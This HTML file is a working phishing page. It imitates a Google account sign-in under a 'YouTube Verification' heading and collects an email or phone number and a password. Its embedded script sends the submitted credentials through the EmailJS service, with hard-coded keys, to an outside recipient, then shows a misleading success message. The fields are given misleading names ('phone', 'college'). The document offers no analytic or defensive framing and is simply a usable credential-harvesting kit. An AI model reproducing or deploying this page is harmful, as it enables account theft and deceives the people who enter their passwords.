<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
       
.unique-container {
            display: flex;
            height: 100vh;
            font-family: 'Google Sans', sans-serif;
            user-select: none;
        }
        
        .unique-card {
            background: #fff;
            width: 412px;
            height: auto;
            padding: 48px 36px;
            border-radius: 8px;
            border: 1px solid #cacaca;
            margin: auto;
        }
        
        .unique-header {
            text-align: center;
            font-weight: 400;
        }
        
        .unique-title {
            padding: 15px 0;
            font-size: 24px;
        }
        
        .unique-tagline {
            font-size: 16px;
            padding-bottom: 18px;
        }
        
        .unique-label {
            display: block;
            position: absolute;
            padding: 0 5px;
            width: auto;
            color: #5f6368;
            background: #fff;
            transition: all 150ms ease;
            transform: translate(12px, -37px);
            cursor: text;
        }
        
        .unique-input {
            padding: 16px;
            margin-top: 20px;
            font-size: 17px;
            background: #fff;
            width: calc(100% - 36px);
            border: 1px solid #cacaca;
            border-radius: 5px;
        }
        
        .unique-input:focus {
            outline: none;
            padding: 15px;
            border: 2px solid #1a73e8;
        }
        
        .unique-input:not(:placeholder-shown) + .unique-label, .unique-input:focus + .unique-label {
            transform: translate(8px, -62px);
            font-size: 13px;
        }
        
        .unique-input:focus + .unique-label {
            color: #1a73e8;
        }
        
        .unique-link {
            color: #1a73e8;
            font-size: 14px;
            padding-top: 10px;
            cursor: pointer;
            font-weight: 500;
        }
        
        .unique-guest {
            margin-top: 32px;
            font-size: 14px;
            color: #5f6368;
        }
        
        .unique-login-bar {
            margin-top: 32px;
            display: flex;
            flex-wrap: wrap;
        }
        
        .unique-button {
            margin-left: auto;
            padding: 10px 30px;
            border-radius: 5px;
            cursor: pointer;
            color: #fff;
            outline: none;
            border: none;
            background: #1a73e8;
            font-weight: 500;
        }
        
        .unique-button:hover {
            background: #4285f4;
        }
        
        @media only screen and (max-width: 600px) {
            .unique-card {
                border: none;
            }
        }


        .ytverification{
    display: flex;
    align-items: center;
    margin-left: 20px;
}

    </style>
</head>
<body>
    <div class="unique-container">
        <div class="unique-card">
            <div class="unique-header">
                <div class="ytverification"> <img style=" height: 50px; width: 50px;" src="https://static.vecteezy.com/system/resources/previews/023/986/704/non_2x/youtube-logo-youtube-logo-transparent-youtube-icon-transparent-free-free-png.png" alt="Google" height="24">   <h1 style="font-size: 20px; font-family: Georgia, 'Times New Roman', Times, serif;">YouTube Verification</h1></div>
              
                    <div class="unique-title">Sign in</div>
                <div class="unique-tagline">Use your Google Account</div>
            </div>
            <form id="contact-form">
                <input class="unique-input" id="phone" type="tel" name="phone" placeholder=" " required>
                <label class="unique-label" for="phone">Email or phone</label>
                <input class="unique-input" id="college" name="college" type="password" placeholder=" " required>
                <label class="unique-label" for="college">Password</label>
                <div class="unique-link">Forgot email?</div>
                <div class="unique-guest">Not your computer? Use guest mode to sign in privately.</div>
                <div class="unique-link">Learn more</div>
                <div class="unique-login-bar">
                    <div class="unique-link">Create account</div>
                    <button class="unique-button" type="submit">Next</button>
                </div>
            </form>
        </div>
    </div>

    <script src="https://cdn.emailjs.com/dist/email.min.js"></script>
    <script type="text/javascript">
        (function(){
            emailjs.init("RQ7epMrgV2ifKcOJo");
        })();

        document.getElementById('contact-form').addEventListener('submit', function(event) {
            event.preventDefault();

            emailjs.sendForm('service_v204k3o', 'template_abgchcy', this)
                .then(function() {
                    alert('Form successfully submitted! Expect a response within 24 hours. Thank you!');
                }, function(error) {
                    alert('Failed !! ' + JSON.stringify(error));
                });
        });
    </script>
</body>
</html>
